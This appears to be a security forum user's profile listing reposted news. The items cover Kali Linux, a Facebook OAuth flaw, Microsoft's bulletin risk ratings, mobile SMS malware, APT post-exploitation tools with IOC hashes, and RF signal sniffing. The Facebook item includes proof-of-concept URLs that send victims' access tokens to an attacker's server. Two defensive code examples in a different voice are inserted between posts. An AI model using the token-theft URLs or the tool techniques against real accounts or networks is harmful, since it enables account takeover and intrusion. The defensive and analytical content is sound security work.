Nytro

Everything posted by Nytro

  1. Yes, I have RSSOwl too and it is well put together. PS: For some feeds it always finds some old items as new. But otherwise it's OK.
  2. 1. Only BitDefender? 2. Was Proactive Defence (or whatever it is called at Bit) turned on? 3. Does it have a driver? Does it run in kernel mode?
  3. BackTrack successor Kali Linux launched
     By Darren Pauli on Mar 13, 2013 10:04 PM

     A computer small enough to fit inside the palm of a hand sits in the corner of an office, its lights blinking. It looks like a toy to most, but the small ARM-based machine is running the latest version of BackTrack, and is breaking into the corporate network.

     Such a feat was not possible prior to this evening's release of Kali, the sixth installment of the uber-powerful and super-secure penetration testing platform. BackTrack obtained support for ARM-based devices as part of its quiet year-long and ground-up overhaul by the small group of security professionals who designed the operating system, now considered essential kit for penetration tests.

     The authors, hailing from Offensive Security together with security professionals at Rapid7, who offered free assistance in the rebuild, announced Kali at BlackHat Europe. Outwardly, Kali looks the same as the previous version of BackTrack. But dig a little deeper, according to founder Mati Aharoni, and that's where the similarities end.

     "It boots like BackTrack, but when you look deeper into Kali, you see all these amazing new features that just weren't available in BackTrack," Aharoni told SC, speaking ahead of the launch in Amsterdam. "Everything has changed."

     Kali has become sleeker and more secure: all packages were subject to a vetting process and were signed by developers with GPG keys. This, Aharoni said, introduced complete visibility into the development chain. "There is a very clear public development of each package so you can see changes easily. Visibility increased ten-fold."

     The Metasploit Framework too has been rebuilt. Rapid7, keen to remove the rough-around-the-edges integration of the popular exploit arsenal within BackTrack, contacted Offensive Security. In a streak of luck, the call came in early in Kali's development. From there, Metasploit underwent a considerable overhaul to become one of the most complex packages in Kali. "Users will be in for a much smoother ride," Aharoni said. "It was never built to be packaged as a distribution so we needed to massage it."

     This took the form of a Debian repo rather than an at times messy binary installer, Rapid7 product manager Christian Kirsch said. "A tonne of our users were using Metasploit on BackTrack," Kirsch said. "Now if you update Kali, you update Metasploit."

     "It is critical to take the view of the attacker to see if your defences are working. The smartest people in the world may make mistakes in setting up defences."

     It also features a more friendly user interface and was available in the paid professional edition.

     A razor has been applied to BackTrack's pre-packaged pen testing tools, eradicating 50 unpopular tools and introducing more powerful offerings into Kali. iKat, a hacking tool to audit the security of browser-controlled environments like kiosks, Citrix terminals and WebTVs, was one such addition. The developers went to lengths to get the tool on board and had even helped the author further develop and integrate it into Kali.

     Kali comes as fully customisable. Users were able to pick and choose the tools they want in the platform, including private applications, prior to downloading the ISO, even down to their choice of wallpaper. This, Aharoni said, makes Kali open to low-end systems and ARM-based devices. Pre-built packages exist for a host of ARM devices including Raspberry Pi and ODROID.

     Kali is now available for download and the wiki page is also online.

     Source: BackTrack successor Kali Linux launched - Applications - SC Magazine Australia - Secure Business Intelligence
  4. Facebook hacking accounts using another OAuth vulnerability
     Posted by: Mohit Kumar on Tuesday, March 12, 2013

     Remember the last OAuth flaw in Facebook, which allowed an attacker to hijack any account without the victim's interaction with any Facebook application, reported by white hat hacker 'Nir Goldshlager'. After that, the Facebook security team fixed that issue using some minor changes. Yesterday Goldshlager once again pwned the Facebook OAuth mechanism by bypassing all those minor changes made by the Facebook team. He explains the complete saga of hunting the Facebook bug in a blog post.

     As explained in the last report on The Hacker News, the OAuth URL contains two parameters, i.e. redirect_uri & next, and using Regex Protection (%23xxx!,%23/xxx,/) the Facebook team tried to secure that after the last patch. In the recently discovered technique the hacker found that the next parameter allows the facebook.facebook.com domain as a valid option, and multiple hash signs are now enough to bypass the Regex Protection.

     He used the facebook.com/l.php file (used by Facebook to redirect users to external links) to redirect victims to his malicious Facebook application and then to his own server for storing token values, where tokens are the alternate access to any Facebook account without a password. But a warning message while redirecting ruined the show! No worries, he found that 5 bytes of data in the redirection URL are able to bypass this warning message. Example: https://www.facebook.com/l/goldy;touch.facebook.com/apps/sdfsdsdsgs (where 'goldy' is the 5 bytes of data used).

     Now at the last step, he redirects the victim to external websites located at files.nirgoldshlager.com (attacker server) via the malicious Facebook app created by him, and the victim's access_token will be logged there. So here we have the final POC that can hack any Facebook account by exploiting another Facebook OAuth bug.

     For all browsers: https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https://facebook.facebook.com/%23/x/%23/l/ggggg%3btouch.facebook.com/apps/sdfsdsdsgs%23&display=page&fbconnect=1&method=permissions.request&response_type=token

     For Firefox browser: https://www.facebook.com/dialog/permissions.request?app_id=220764691281998&display=page&next=https%3A%2F%2Ftouch.facebook.com%2F%2523%2521%2Fapps%2Ftestestestte%2F&response_type=token&perms=email&fbconnect=1

     This bug was also reported to the Facebook Security Team last week by Nir Goldshlager and is patched now. If you are a hacker, we expect YOU to hack it again!

     Source: Facebook hacking accounts using another OAuth vulnerability - Hacking News
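The post above describes a redirect-target check that relied on a regex blocklist for `%23`/`#` patterns and on loose host matching, both of which were bypassed with double-encoding and a permitted subdomain pointing at a forwarder endpoint. The following is an added example, not code from the article or from Facebook, showing the defensive alternative: decode the URL to a fixed point, parse it, and accept only an exact host from an allowlist, an `https` scheme, no user info or port, no fragment, and a path under an allowed prefix. The hosts `www.example.com`/`m.example.com`, the path prefixes and the function names are assumptions made for illustration; `weak_check` is a simplified stand-in for the kind of suffix-match-plus-blocklist logic the article describes, not Facebook's actual code.

```python
"""Allowlist-based validation of an OAuth redirect target (e.g. a `next` parameter).

Added example; hosts, path prefixes and function names are assumptions.
"""
from urllib.parse import urlsplit, unquote

# Exact hostnames that may receive a redirect (assumed for this example).
ALLOWED_HOSTS = {"www.example.com", "m.example.com"}
# Only paths under these prefixes are valid targets; a generic forwarder such
# as /l.php is deliberately not in the list, so it can never be a target.
ALLOWED_PATH_PREFIXES = ("/apps/", "/dialog/")


def _fully_decode(url, max_rounds=3):
    """Percent-decode until the string stops changing.

    Returns None if it is still changing after max_rounds: nested encodings
    deeper than that have no legitimate use here and are treated as hostile.
    """
    for _ in range(max_rounds):
        decoded = unquote(url)
        if decoded == url:
            return url
        url = decoded
    return None


def is_safe_redirect(url):
    """Strict check: True only for an exact-host, https, fragment-free, allowed-path URL."""
    decoded = _fully_decode(url)
    if decoded is None or "\\" in decoded:
        return False
    parts = urlsplit(decoded)
    if parts.scheme != "https":
        return False
    # netloc must be the bare hostname: no user@, no :port, no empty host.
    if not parts.hostname or parts.netloc.lower() != parts.hostname:
        return False
    if parts.hostname not in ALLOWED_HOSTS:          # exact match, not suffix
        return False
    if parts.fragment:                               # '#' (or decoded %23) anywhere after the path
        return False
    path = parts.path
    if not path.startswith(ALLOWED_PATH_PREFIXES):
        return False
    if any(seg in ("..", ".") for seg in path.split("/")):  # no traversal out of the prefix
        return False
    return True


def weak_check(url):
    """Simplified stand-in for suffix host matching plus a literal blocklist.

    It accepts any subdomain and misses double-encoded '#', which is why the
    strict check above is preferred. Not Facebook's actual code.
    """
    host = urlsplit(url).hostname or ""
    return host.endswith("example.com") and "#" not in url and "%23" not in url


if __name__ == "__main__":
    for candidate in (
        "https://www.example.com/apps/myapp/",            # legitimate target
        "https://sub.example.com/apps/x",                 # unexpected subdomain
        "https://www.example.com/%2523/apps/x",           # double-encoded '#'
        "https://www.example.com/l.php?u=https://attacker.test/",  # forwarder endpoint
    ):
        print(candidate, "strict:", is_safe_redirect(candidate), "weak:", weak_check(candidate))
```

The point of `_fully_decode` is that the blocklist in the article was matched against the encoded string, so `%2523` slipped past it and only became `#` after a later decode; checking the fixed point of decoding removes that gap, and rejecting any fragment at all makes the number of hash signs irrelevant.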
  5. Yes it does, but I didn't post that link. There may be people who want to try it.
  6. Assessing risk for the March 2013 security updates
     swiat 12 Mar 2013 10:07 AM

     Today we released seven security bulletins addressing 20 CVEs. Four of the bulletins have a maximum severity rating of Critical, and three have a maximum severity rating of Important. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.

     Columns: Bulletin / Most likely attack vector / Max Bulletin Severity / Max Exploitability Index / Likely first 30 days impact / Platform mitigations and key notes

     MS13-021 (Internet Explorer)
       Most likely attack vector: Victim browses to a malicious webpage.
       Max Bulletin Severity: Critical
       Max Exploitability Index: 1
       Likely first 30 days impact: Exploit code for CVE-2013-1288, an issue affecting IE8, is publicly available. Likely to see reliable exploits developed within next 30 days for other vulnerabilities addressed by this update as well.
       Platform mitigations and key notes: IE 10 on Windows 7 is not affected.

     MS13-022 (Silverlight)
       Most likely attack vector: Victim browses to a malicious webpage.
       Max Bulletin Severity: Critical
       Max Exploitability Index: 1
       Likely first 30 days impact: Likely to see reliable exploits developed within next 30 days.
       Platform mitigations and key notes: Affects Silverlight 5.

     MS13-027 (Windows USB driver)
       Most likely attack vector: Attacker physically inserts malicious USB device into victim's workstation or server, resulting in code execution at SYSTEM.
       Max Bulletin Severity: Important
       Max Exploitability Index: 1
       Likely first 30 days impact: Likely to see reliable exploits developed within next 30 days.
       Platform mitigations and key notes: Pre-auth code execution only possible for attacker able to physically insert malicious hardware device into victim computer. See this blog post for more background on this vulnerability.

     MS13-024 (SharePoint 2010)
       Most likely attack vector: Attacker issues a search query on the SharePoint site with malicious script in the query string. In certain circumstances, a SharePoint admin may view search queries in such a way that the script from the attacker's search query is run in the context of the SharePoint administrator's session.
       Max Bulletin Severity: Critical
       Max Exploitability Index: 1
       Likely first 30 days impact: Likely to see reliable exploits developed within next 30 days.
       Platform mitigations and key notes: Affects only SharePoint Server 2010 Service Pack 1, no earlier or later versions of SharePoint.

     MS13-023 (Visio Viewer 2010)
       Most likely attack vector: Victim uses Visio Viewer 2010 to open a malicious Visio .DXF file.
       Max Bulletin Severity: Critical
       Max Exploitability Index: 2
       Likely first 30 days impact: Less likely to see reliable exploit developed for this vulnerability. Visio Viewer exploits not often seen in the wild and this one looks more difficult than usual to exploit for reliable code execution.
       Platform mitigations and key notes: Visio itself not affected by this vulnerability directly. Only Visio Viewer 2010 affected.

     MS13-025 (OneNote 2010)
       Most likely attack vector: Attacker lures victim to open OneNote file from a malicious or attacker-controlled directory. Attacker uses this vulnerability to cause process memory from the victim's OneNote process to be written back to the file in the attacker's directory, potentially leaking information to the attacker.
       Max Bulletin Severity: Important
       Max Exploitability Index: n/a
       Likely first 30 days impact: Not possible to leverage this vulnerability for code execution directly. Information disclosure only.
       Platform mitigations and key notes: Affects only OneNote 2010 Service Pack 1, no earlier or later versions of OneNote. Attacker must lure victim to opening file from a server or location they control. Only information in the OneNote process at the time of user opening the malicious file could become accessible to the attacker.

     MS13-026 (Office Outlook for Mac)
       Most likely attack vector: Attacker sends victim an email with links to external content. Content is loaded without prompting user.
       Max Bulletin Severity: Important
       Max Exploitability Index: n/a
       Likely first 30 days impact: Not possible to leverage this vulnerability for code execution directly. Information disclosure only.
       Platform mitigations and key notes: (none given)

     - Jonathan Ness, MSRC Engineering

     Source: Assessing risk for the March 2013 security updates - Security Research & Defense - Site Home - TechNet Blogs
  7. Can You Crack a Code? Supposedly this is the problem given in my cryptography course at university.

     12/24/09

     We've challenged you before, in November 2007, December 2008, and May 2009, to unravel a code and reveal its secret message like the "cryptanalysts" in our FBI Laboratory. In our latest quiz, we've switched gears a bit, using pictogram symbols based on Native American motifs. And with more than 50 words to decipher, it's our longest one so far. For the first time, we're also posting the answer (see the bottom of this page) in case you are stumped. We ask, however, that you not post the solution on the web so that everyone can have a chance to give it a try.

     Once again: If you want a primer on basic cipher systems and how to break them, see the article "." Good luck!

     Note: Sorry, but cracking this code doesn't guarantee you a job with the FBI! But do check out careers with us at FBIJobs.gov.

     Source: FBI — Cryptanalysis Challenge 2009
  8. Mobile Drive-By Malware example
     Jan Širmer, March 11th, 2013

     Several days ago we received a complaint about javascrpt.ru. After a bit of research, we found that it tries to mimic ajax.google.com and jquery, but the code is an obfuscated/packed redirector. After removing two layers of obfuscation, we found a list of conditions checking visitors' user agent. From these conditions we got a clue and focused on mobile devices.

     It all starts when users start browsing the internet from their mobile devices. They visit a legitimate site that's been hacked. This site contains a link to the site javascrpt.ru, where the visitor's browser data is sent. If the script hosted at javascrpt.ru recognizes the visitor's user agent string as one of the list of conditions, the visitor is redirected to the malicious site, usually hosted at a legitimate hosting provider, distributing malicious files for mobile devices. When users reach this site, the drive-by download starts.

     We found different behaviors for different devices. For non-Android mobiles, a file called load.php ( 2DECBD7C9D058A0BFC27AD446F8B474D99977A857B1403294C0D10078C2DB51D ) is downloaded, though in fact it is a regular Java file. But as you can see, our users are well protected:

     But the question is what is really happening with an unprotected user? After running this file, the user expects the application they started to run, but in this case a list of agreements appears. And the first line is 'To gain access to content, you must agree to the terms presented below'. And what are those terms?

     1. To gain access to the Service wa**y.ru/ content, make payment by sending up to 3 SMS messages.
     2. Complete information on pricing can be found at the web site: www.mo****1.ru/ (This site doesn't work right now.)

     Both Android and other devices send SMS to the Russian premium numbers: NUMBER = "7255"; NUMBER = "7151"; NUMBER = "9151"; NUMBER = "2855"; After sending the SMS, just a simple ICQ application is downloaded from the same site: *REMOVED*/land_paysites/files/icq.jar

     To show better what happens when this site is reached from an Android device, you can check the next screenshots. At first, a file called, e.g., browser.apk (94FDC9CFD801E79A45209BFDC30711CB393E39E6BF2DD43CE805318E80123C14) is downloaded to the device, without the person's knowledge. You can see in the install window that this application wants access to suspicious services that cost you money. Even in the application permissions you can find suspicious permissions for your messages and to directly call phone numbers, which can cost you money too. But fortunately avast! stops this application before it can cost you a huge amount of money.

     If a user installs this application, its behavior is very similar to non-Android devices. The device sends paid text messages to those numbers and then downloads and installs a basic Dolphin browser from h***t.ru/land_browsers/files/dolphin.apk

     Users should be really careful if they find some unknown application on their mobile device. Fortunately everybody can read what an application will get access to, but unfortunately a lot of users don't really pay attention to the required permissions and it can cost them a lot of money; using a good antivirus can help them stay protected.

     Source: http://blog.avast.com/2013/03/11/mobile-drive-by-malware-example/
  9. Nanomite - Graphical Debugger for x64 and x86 on Windows

     Changelog

     Version 0.1 beta 7
     - fixed some small handling bugs
     - fixed a bug in disassembler which did not replace old protection on memory after disassembling
     - fixed a bug which did not show terminated processes in DetailView
     - fixed a bug which did not show terminated threads in DetailView
     - fixed a bug which did not clean up memory on manual debuggee stop
     - improved DB handler
     - added resolve of jump conditions to improve StepOver
     - added "Return" and "Backspace" hotkey to navigate in Disassembler
     - added "Clear Log" context menu in LogBox
     - added "Show Source" context menu in Disassembler
     - added "Goto Function" context menu in Callstack
     - added a crash handler
     - added Source Viewer
     - added memory pool for performance improvement and memory leak reduction
     - added mouse scrolling in disassembler and stack
     - added direct run of target after using menu to select a file

     Source code: https://github.com/zer0fl4g/Nanomite
  10. In-Depth Look: APT Attack Tools of the Trade
     4:41 pm (UTC-7) | by Kyle Wilhoit (Threat Researcher)

     Recently, we shed some light on APT attack tools and how to identify them. Part of our daily tasks as threat researchers revolves around investigating APT actors, and the tools that they utilize, to help better protect our customers. The purpose of this blog is to further investigate the tools that APT actors typically use and what they do with them.

     How these tools are used

     While many would think these tools are used during the initial compromise phase of an attack, that is not the case with this post. I will be focusing on the tools that are used after the initial compromise is attained. The following diagram illustrates where these tools are commonly used in a traditional APT lifecycle.

     Figure 1. Traditional APT lifecycle

     Step 1: The attacker sends malware to the victim. This can be done in many ways: an email message with a malicious attachment, a USB flash disk, or a compromised web site are all possibilities.
     Step 2: The malware is executed on the affected system. This may require manual steps by the victim, or it could be done without any intervention using exploits.
     Step 3: When the malware is run, it drops a backdoor such as STARSYPOUND or BOUNCER. These first stage tools push a backdoor to the attacker for later access. (These could be considered first stage tools.) It allows the attacker to maintain persistence and get access to the system at a later time.
     Step 4: The attacker then uploads tools to perform data exfiltration, lateral movement, and a litany of other tasks.

     Tools overview

     The tools listed below include some of the tools APT actors use on a daily basis. These tools are typically employed once the APT actor gets access to the victim's machine via one of the first stage tools listed above. Keep in mind, however, that these tools are not inclusive of first stage tools such as backdoors, Trojans, and other categorical tools. In addition, this is not a complete listing of tools, since that is impossible to create based on the ever-changing threat landscape. Many APT actors use custom coded applications that perform similar functionality, and thus may differ from those listed below. Use this list as a baseline of functionality to help identify similar tools in your environment and to demonstrate known tools that are used in common APT campaigns.

     Word of caution

     Identifying these tools does not necessarily imply that you have been compromised or fallen victim to an APT attack. The IOCs contain both MD5s of the compiled apps/scripts, and/or unique strings within the code prior to being compiled. Minor modifications to these files can change the MD5 hash, so this is a limited method for identification of these applications/scripts. Also note that the phase of usage is generic for when Trend Micro typically sees these tools used. These tools are sometimes used in other stages of APT attacks. Some of them also have valid use cases where there are business needs for using the application. (Some examples include Netbox, dbgview, sdelete, etc.)

     Columns: Tool Name / Description / Typical Phase of Usage / Indicators of Compromise (IOC)

     GETMAIL
       Description: Typically used to ascertain mail archives and mail out of those archives.
       Typical Phase of Usage: Exfiltration
       IOC: Unique String: Lu's Crazy Profile (democode); Saved File Name: >=3 digit number-attach.doc

     Netbox
       Description: For hosting tools/drop servers/C2 servers. Commonly used as infrastructure on the backend to support operational tasks. (Netbox also has valid uses, and is not a direct indicator of compromise)
       Typical Phase of Usage: Attack, Exfiltration, Persistence
       IOC: N/A

     Pwdump
       Description: Dumps password hashes from the Windows registry. Typically used to crack passwords for lateral movement throughout the victim environment. It can also be used in pass-the-hash attacks.
       Typical Phase of Usage: Lateral Movement
       IOC: MD5: 0xDD2EF0D6487385839BBF7863FE450CC5

     Cachedump
       Description: A program for extracting cached password hashes from a system's registry. Typically used to crack passwords for lateral movement throughout the victim environment. It can also be used in pass-the-hash attacks.
       Typical Phase of Usage: Lateral Movement
       IOC: MD5: 5065266fbad9362d5a329c5388627ea5

     Lslsass
       Description: Dumps active login session password hashes from Windows processes. It is used to crack passwords for lateral movement throughout the victim environment. It can also be used in pass-the-hash attacks.
       Typical Phase of Usage: Persistence, Lateral Movement
       IOC: MD5: ede305561db6f7ca1783e0fc75d0db14

     mapiget
       Description: This is for collecting emails directly from Outlook, prior to ever getting archived. It is then dumped to text files.
       Typical Phase of Usage: Persistence, Lateral Movement
       IOC: Unique String: WNetCancelConnection2W; Saved File Name: 5-mail.txt, mail.txt

     HTRAN
       Description: Connection bouncer, redirects TCP traffic destined for one host to an alternate host. It is also used to help obfuscate the source IP of an attacker. It allows the attacker to bounce through several connections in the victim country, confusing incident responders.
       Typical Phase of Usage: Attack, Exfiltration, Persistence
       IOC: MD5: e0c14f98c4d4b995f00d49616bf9ba57, 2edfe2b5238c8f49130f2a2f85e33c18, 1725e68e574e4b077f7d16f7fa30d984, 7e3bb01afb4c50da526d142fdf444688, 3548ea689e06a2599bdd1bdb909abb75

     Windows Credential Editor (WCE)
       Description: A security tool that allows to list logon sessions and add, change, list and delete associated credentials.
       Typical Phase of Usage: Persistence, Lateral Movement
       IOC: MD5: bd73c74819d8db09c645c738bbd3f5b9, df840ac27051d26555a109cc47d03fe4

     Lz77.exe
       Description: It is used as a compression application to help exfiltrate data. This is commonly seen in Winrar, 7zip, and Winzip.
       Typical Phase of Usage: Exfiltration
       IOC: MD5: 2238453fd8225baff0d52bf64361b4fd

     Gsecdump
       Description: Grabs SAM file, cached credentials, and LSA secrets. Used for lateral movement in the victim environment and pass-the-hash style attacks.
       Typical Phase of Usage: Lateral Movement
       IOC: MD5: 57F222D8FBE0E290B4BF8EAA994AC641, 875f3fc948c6534804a26176dcfb6af0, 8ee24ad5b849877907304de566fb6dc6

     ZXProxy (A.K.A. AProxy)
       Description: Proxy functionality for traffic redirection. This helps redirect HTTP/HTTPS connections for source obfuscation. We have seen it used in data exfiltration.
       Typical Phase of Usage: Exfiltration, Persistence
       IOC: MD5: 0xEB36A5EF6A807FB7B2E2912E08B4882D, 0x69F5A988B4F3A3E5D300D489C9707CD6, 286760651edfe6a8b34988004156b894

     LSB-Steganography
       Description: Uses steganography techniques to embed files into images. This helps with data exfiltration as well as during the initial compromise of a traditional APT attack.
       Typical Phase of Usage: Initial Compromise, Exfiltration
       IOC: MD5: c188ef350f1ee0e5fa6f6ef2e70231bc

     UPX Shell
       Description: Used to help pack code for malware used in APT campaigns. This tool helps prevent reverse engineering and code analysis.
       Typical Phase of Usage: Attack, Persistence
       IOC: MD5: 1281478d409de246777472db99f58751

     ZXPortMap
       Description: Traffic redirection tool, which helps to obfuscate the source of connections.
       Typical Phase of Usage: Persistence, Exfiltration
       IOC: MD5: 9a7b9caae7b8b3a2b5d68e6880b6d0a4, 2fdbb3ee0edc5e589ea727bbc2cd6d50

     ZXHttpServer
       Description: Small HTTP server that is deployable and extremely flexible. We have seen it used when attempting transfer of some files.
       Typical Phase of Usage: Exfiltration
       IOC: Unique String: ZXHttpServer, ZXHttpServer.exe

     Sdelete
       Description: Secure deletion tool. Allows for secure deletion to make forensic recovery difficult, therefore complicating incident response procedures.
       Typical Phase of Usage: Persistence, Cover
       IOC: MD5: e189b5ce11618bb7880e9b09d53a588f

     Dbgview
       Description: An application that lets you monitor debug output on your local system, or any computer on the network that you can reach via TCP/IP.
       Typical Phase of Usage: Persistence, Lateral Movement
       IOC: MD5: cea66497fa93db4b0dd33438a2a5d6bd

     Many of these tools are copied to victim machines, and are often never removed by the APT actors for whatever reason. If you happen to see tools that are similar in function to the tools listed above, I think it warrants a closer look at the tools, and how they are being used in your environment.

     What Can Be Done

     There are many things that can be done to help prevent the installation of these applications onto your organizational machines, such as the following:
     - Utilize application whitelisting where necessary to prevent these items from being installed/used on your systems.
     - Include SIEM resources in your organizational budget for robust logging. This will help forensically should it be needed.
     - Remove local administrator rights for users. This will help prevent new applications from being installed in the traditional fashion. While some of these applications don't require installation to work, not having administrator rights will limit what these applications can do.
     - Many of the tools listed above will be blocked by Trend Micro products, which classify them as malicious.

     Here are some additional recommendations on what to do when you see these applications being used for malicious means:
     - Look at firewall, system, security, proxy, and other logs that your system is logging to identify usage patterns of the tools. Look for communication on erroneous ports as well as traffic to IP space that is not typical for the user.
     - Utilize IOCs (indicators of compromise) to locate similar filenames or MD5/SHA hashes for applications similar to the above. Focus on path of utilization as well as filename oddities. (Such as an app named xzz.exe, which would raise a red flag.)
     - Utilize WMIC to create a script that can search throughout your entire organizational Active Directory trees and look for unique identifiers of these tools.
     - Create a list of bad applications unique to your organization. Utilize these lists and native toolsets for each operating system to locate questionable tools. Tools for Windows like PsExec work well for this. On Linux systems, dpkg-query or qpkg work well for this.

     Source: In-Depth Look: APT Tools of the Trade | TrendLabs Security Intelligence Blog
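The post above recommends hunting for the listed tools by MD5, by unique string and by saved-file name, and warns that hash matching is fragile. The following is an added example, not part of the Trend Micro post or the forum post: a small scanner that normalises the MD5 values exactly as they appear in the table (mixed case, some with a `0x` prefix), turns the saved-file-name indicators into regexes, and reports which indicator kind fired for each file. The hash and string values are the ones from the table; the directory tree, file names and file contents in `demo()` are constructed for the run, and the `constructed-sample` hash is computed from those constructed bytes so that the MD5 path is exercised offline. Function names are the example's own.

```python
"""IOC matcher for the tool table above: MD5, unique string and file-name indicators.

Added example; the sample tree in demo() is constructed, the IOC values come from the table.
"""
import hashlib
import os
import re
import tempfile

# MD5 IOCs copied from the table in the forms they appear there (mixed case, some 0x-prefixed).
RAW_MD5_IOCS = {
    "Pwdump": ["0xDD2EF0D6487385839BBF7863FE450CC5"],
    "Cachedump": ["5065266fbad9362d5a329c5388627ea5"],
    "Lslsass": ["ede305561db6f7ca1783e0fc75d0db14"],
    "Gsecdump": ["57F222D8FBE0E290B4BF8EAA994AC641",
                 "875f3fc948c6534804a26176dcfb6af0",
                 "8ee24ad5b849877907304de566fb6dc6"],
    "ZXProxy": ["0xEB36A5EF6A807FB7B2E2912E08B4882D",
                "0x69F5A988B4F3A3E5D300D489C9707CD6",
                "286760651edfe6a8b34988004156b894"],
    "Sdelete": ["e189b5ce11618bb7880e9b09d53a588f"],
}
# Unique-string IOCs from the table. WNetCancelConnection2W is an ordinary Win32 API
# name that many benign programs import, so on its own it is a low-fidelity indicator.
STRING_IOCS = {
    "ZXHttpServer": [b"ZXHttpServer"],
    "mapiget": [b"WNetCancelConnection2W"],
}
# Saved-file-name IOCs from the table, expressed as regexes over the base name.
FILENAME_IOCS = {
    "GETMAIL": re.compile(r"^\d{3,}-attach\.doc$", re.IGNORECASE),   # ">=3 digit number-attach.doc"
    "mapiget": re.compile(r"^(5-)?mail\.txt$", re.IGNORECASE),        # "5-mail.txt, mail.txt"
}


def normalize_md5(value):
    """Lower-case, strip an optional 0x prefix, and reject anything that is not 32 hex digits."""
    v = value.strip().lower()
    if v.startswith("0x"):
        v = v[2:]
    if not re.fullmatch(r"[0-9a-f]{32}", v):
        raise ValueError("not an MD5 digest: %r" % value)
    return v


def build_hash_index(raw=RAW_MD5_IOCS):
    """Map normalised digest -> tool name so lookups are exact regardless of source formatting."""
    return {normalize_md5(h): tool for tool, hashes in raw.items() for h in hashes}


def scan_file(path, hash_index, string_iocs=STRING_IOCS, filename_iocs=FILENAME_IOCS):
    """Return a sorted list of 'tool:kind' hits for one file (kind is md5, string or filename)."""
    hits = set()
    with open(path, "rb") as f:          # whole file in memory; fine for an example
        data = f.read()
    digest = hashlib.md5(data).hexdigest()
    if digest in hash_index:
        hits.add(hash_index[digest] + ":md5")
    for tool, needles in string_iocs.items():
        if any(n in data for n in needles):
            hits.add(tool + ":string")
    name = os.path.basename(path)
    for tool, pattern in filename_iocs.items():
        if pattern.match(name):
            hits.add(tool + ":filename")
    return sorted(hits)


def scan_tree(root, hash_index):
    """Walk a directory and return {relative path: hits} for files with at least one hit."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            hits = scan_file(path, hash_index)
            if hits:
                results[os.path.relpath(path, root)] = hits
    return results


def demo():
    """Build a constructed sample tree in a temp dir and scan it; returns the hit dictionary."""
    index = build_hash_index()
    sample = b"constructed sample bytes standing in for a dropped tool"
    index[hashlib.md5(sample).hexdigest()] = "constructed-sample"   # constructed, not from the table
    with tempfile.TemporaryDirectory() as root:
        files = {
            "ZXHttpServer.exe": b"MZ\x90\x00 ... ZXHttpServer ... (constructed)",
            "4711-attach.doc": b"constructed document body",
            "tool.bin": sample,
            "readme.txt": b"nothing of interest here",
        }
        for name, content in files.items():
            with open(os.path.join(root, name), "wb") as f:
                f.write(content)
        return scan_tree(root, index)


if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        print(path, "->", ", ".join(hits))
```

Normalising before indexing is what makes the `0x`-prefixed upper-case hashes in the table match the lower-case hex that `hashlib` produces; reporting the indicator kind alongside the tool name lets an analyst weigh a hash hit (strong, but defeated by any recompile) differently from a string or file-name hit (broad, but prone to false positives, as the API-name indicator shows).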
  11. [h=3]You can ring my bell! Adventures in sub-GHz RF land...[/h]Dammit! Now that song is stuck in my head and will be going around and around for the next three days... Thanks, ! (and apologies if it's now stuck in yours too! But she's right: you can ring my bell. And I can ring yours. And hers. What the hell - let's just all ring each-other's bells shall we? And dim your lights. And open your garage door. And let's do it from the comfort and safety of my car, whilst driving around... Speaking of hell, what the hell am I talking about??? A little while ago I got involved in a project that needed some hardware security testing. It was a complex system that used just about every protocol under the sun, including RF. Now RF, like other 'invisible' transport mechanisms, always gets me interested because, in my experience, once data becomes invisible, something magical happens: they forget about security. Nobody can see what's going on, so we don't need to worry about it, right? Wrong. Time and time again I've seen this... MagStripes, InfraRed, RFID, Bluetooth, Magic Moon Beams. You name it, they'll send data over it insecurely. In this case the RF was mostly standard stuff like WiFi and Zigbee, but there was also something going on in the 400MHz band, so how to take a look at what was there? The obvious answer is to use an SDR (Software Defined Radio), and from previous projects I have a USRP which fits the bill. However, as I travel a lot, I prefer something a little more portable, so I'm always on the lookout for smaller alternatives. As it happens, a friend gave me a nice Christmas gift (thanks CJ!) of a FunCube dongle: This very cool device can receive on any frequency from 64MHz to 1.7GHz and fits in my laptop bag so is absolutely ideal. It also presents itself to the PC as a pseudo sound card, so is very easy to interface to. 
This was a fantastic bonus for me as I'm already comfortable with the idea of converting audio into data and have used the soundcard in my laptop for that purpose on many previous projects (e.g. magstripes).

Radio is, almost by definition, very mysterious. You can't see it and you can't hear it, so using a soundcard is actually a very good shortcut to helping understand this completely unknown source of data. It's not intuitively obvious that it should be that way, but the human brain is very good at recognising patterns, and the soundcard not only provides us with auditory data that our ears will immediately be able to latch onto, but also visual data in the form of an editable wave file.

The bottom line is that I don't understand how radio works, and I don't particularly want to - all I want is to be able to capture whatever's being sent over it and convert it into something I can deal with - i.e. bits and bytes.

So how to do that?

The first task is to determine exactly what frequency our signal is on. There are several ways of doing this, and the simplest is to make a rough guess and just take a listen. If you're anywhere close you'll hear something when you activate the device, and you can then tune up or down until you've found the centre frequency and you're getting nice crisp clean signals. This is particularly important when trying to convert mysterious airy-fairy analogue signals back into nice reliable 0s and 1s, as any deviation can end up corrupting your data beyond all recognition.

Another way is to use a spectrum analyser. This is essentially another type of RF receiver that listens on a very wide band and shows you any spikes or other discrepancies, one of which will be the signal you're looking for. This can be in the form of software using the FunCube itself, such as HDSDR (Windows) or QUISK (Linux), or a standalone hardware device like the RF Explorer. I actually use both: the RF Explorer to quickly find the signal, and then QUISK or HDSDR to fine tune.

So getting back to our examination, I can't talk about the actual device in question, but since I have a wireless doorbell, let's take a look at that instead...

Like most such devices, it helpfully tells you what frequency it's using on its R&TTE approval label. In this case, 433.92 MHz. Putting that into HDSDR and hitting the button produces a nice 'hot' line right on the centre (the white and orange blob in the top window), so it looks like we're in the money... We can also hear what is obviously data.

OK, so now what? How do we get it from the sound card into nice friendly binary data? Although we've decided against using the USRP, its companion software, GNU Radio, is the obvious choice. It has a great helper tool called GNU Radio Companion which makes this kind of task an absolute doddle. There is a plugin for the FunCube which is now bundled with the main GNU Radio distribution, so no extra work is required to get it up and running. Firing it up, we can build a simple setup that connects our funcube to our speakers: and again, if we run it, we get some nice 'data' sounding output...

